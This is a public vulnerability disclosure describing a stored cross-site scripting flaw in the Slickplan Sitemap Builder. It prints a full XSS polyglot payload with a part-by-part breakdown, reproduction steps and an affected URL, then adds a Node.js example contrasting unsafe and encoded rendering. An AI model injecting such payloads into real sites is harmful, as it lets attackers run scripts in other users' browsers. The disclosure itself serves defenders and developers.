Slickplan Sitemap Builder Vulnerability disclosure

2019.09.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Product Owner: Slickplan Sitemap Builder
Found by: xdff4ee
Application Name: Basic sitemap builder
Version: 1.0
Severity: High
Authentication: Required
Complexity: Easy
Vulnerability Name: Stored Cross-site scripting - XSS Polyglot (Stored)

Vulnerability Explanation:
An XSS polyglot is an XSS vector that is executable, in its raw form, within several different injection contexts (HTML body, attribute value, JavaScript string or comment, and so on), so a single stored value fires regardless of where the application later reflects it.

Browsers Verified In:
Firefox 68.0.2 (64-bit)
Google Chrome 76.0.3809.100 (64-bit)

Anatomy of the polyglot:
jaVasCript: - A label in ECMAScript; a URI scheme otherwise.
/*-/*`/*\`/*'/*"/**/ - A multi-line comment in ECMAScript; a literal-breaker sequence that closes backtick, single-quoted and double-quoted strings.
(/* */oNcliCk=alert() ) - A tangled execution zone wrapped in invoking parentheses.
//%0D%0A%0d%0a// - A single-line comment in ECMAScript; a double CRLF if it lands in HTTP response headers.
</stYle/</titLe/</teXtarEa/</scRipt/--!> - A sneaky HTML-tag-breaker sequence that terminates style, title, textarea and script elements as well as an HTML comment.
\x3csVg/<sVg/oNloAd=alert()//>\x3e - An innocuous-looking svg element whose onload handler runs as soon as it is rendered.

Impact:
Stored XSS allows an attacker to embed a malicious script into a vulnerable page; the script then executes in the browser of every user who views that page, with no further interaction. Reflected cross-site scripting, by contrast, relies on a victim being socially engineered into clicking a malicious link, sent via e-mail for example.

Proof of Concept (Stored Cross-site scripting - XSS Polyglot (Stored)):

Affected items:
Sitemap URL: https://lmentrix.slickplan.com/sitemap/edit/nxwhsr7gra

Stored Polyglot XSS Execution - Different browsers

Payload Used (wrapped in an HTML comment):
<!-- jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(123) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(123)//>\x3e -->

Steps to reproduce:
1. Log in with a valid username and password.
2. Enter the payload above in the Sitemap Name field, then click to create the sitemap. The stored polyglot XSS payload executes in your browser.
3. Refresh the page and clear the cookies: the payload still executes, confirming that it is stored rather than merely reflected.
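To show why this one payload survives more than one rendering context, here is an added Node.js example (not Slickplan's code and not part of the original advisory). It takes the advisory's payload and renders it into three constructed output contexts of a hypothetical sitemap page: element text (title), an attribute value, and a JavaScript string literal. renderUnsafe concatenates the raw value the way a vulnerable application would; renderSafe applies context-specific encoding. The template, the function names and the foreignTags check are assumptions made for illustration.

```javascript
// Added example, not the vendor's code. Demonstrates how the advisory's
// polyglot breaks out of three rendering contexts when concatenated raw,
// and is inert once each context is encoded appropriately.

// The stored value from the advisory (inner payload, without the HTML
// comment wrapper the researcher used). Backslashes are escaped for JS.
const POLYGLOT =
  'jaVasCript:/*-/*`/*\\`/*\'/*"/**/(/* */oNcliCk=alert(123) )//%0D%0A%0d%0a//' +
  '</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(123)//>\\x3e';

// Tags the (hypothetical) page template itself emits; anything else in the
// rendered output came from user data.
const EXPECTED_TAGS = ['title', 'input', 'script'];

// HTML text and attribute context: encode the five significant characters.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: JSON-encode the value (handles quotes,
// backslashes, newlines), then also encode "<" and ">" so the literal can
// never contain "</script" and terminate the enclosing script element.
function escapeJsString(s) {
  return JSON.stringify(String(s)).replace(/</g, '\\u003c').replace(/>/g, '\\u003e');
}

// Vulnerable rendering: raw string concatenation into every context.
function renderUnsafe(name) {
  return `<title>${name}</title>\n` +
    `<input value="${name}">\n` +
    `<script>var sitemapName = '${name}';</script>`;
}

// Hardened rendering: one encoder per context.
function renderSafe(name) {
  return `<title>${escapeHtml(name)}</title>\n` +
    `<input value="${escapeHtml(name)}">\n` +
    `<script>var sitemapName = ${escapeJsString(name)};</script>`;
}

// Crude illustration check (not a sanitizer): list tag names present in the
// output that the template did not emit itself.
function foreignTags(html, expected) {
  const tags = [...html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)]
    .map((m) => m[1].toLowerCase());
  return [...new Set(tags.filter((t) => !expected.includes(t)))];
}

console.log('unsafe leaks:', foreignTags(renderUnsafe(POLYGLOT), EXPECTED_TAGS));
console.log('safe leaks:  ', foreignTags(renderSafe(POLYGLOT), EXPECTED_TAGS));
```

With the raw concatenation, the tag-breaker sequence and the svg element land in the document as real markup (style, textarea and svg tags the template never wrote); with per-context encoding, the same value survives only as text, and the JavaScript literal still round-trips to the original string for legitimate use. The fix for a stored XSS like this one is that output encoding at every sink, not input filtering of the name field.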
A complete PoC video is also attached for better understanding. After repeated e-mails, the vendor didn't reply, so I decided to disclose publicly.

References:

https://slickplan.com/


Copyright 2024, cxsecurity.com